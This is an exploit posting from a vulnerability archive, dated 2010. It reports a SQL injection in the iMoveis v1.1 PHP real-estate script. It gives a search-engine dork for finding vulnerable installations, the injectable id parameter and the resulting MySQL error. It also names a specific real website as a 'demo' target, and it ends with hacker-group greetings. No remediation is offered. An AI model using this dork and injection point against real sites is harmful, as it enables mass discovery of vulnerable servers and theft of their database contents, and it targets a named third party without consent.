iMoveis v1.1 SQL Injection Vulnerability

2010-10-28T00:00:00
ID 1337DAY-ID-14624
Type zdt
Reporter EraGoN
Modified 2010-10-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================
iMoveis v1.1 SQL Injection Vulnerability
========================================

# Date : 26/10/2010
# Author : EraGoN
# Software link : http://baixar7.com/download/acc-imoveis-script-php.rar/3d1e7bf4b9
# Version : 1.1
# Tested on : Linux / Windows XP


# Dork :

inurl:imoveis.php?id=

#Error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server

version for the right syntax to use near '20'' at line 1

#Vuln :

http://www.site.org/imoveis.php?id=20

#Demo :

http://www.cameron.eng.br/2006/imoveis.php?id=20


**Proud to be Muslim
**Proud to be Albanian
**www.eragon.ws

Contact : [email protected]


[ Special Thanks : KuBaNeZi , DJ-DUKLI , The|Denny` , Loock3D , BaDBoY ]
[ Visit / Greetz : ALBANIAN-LEGENDS.COM Members - www.eragon.ws - www.uah1.org.uk ]



#  0day.today [2018-01-08]  #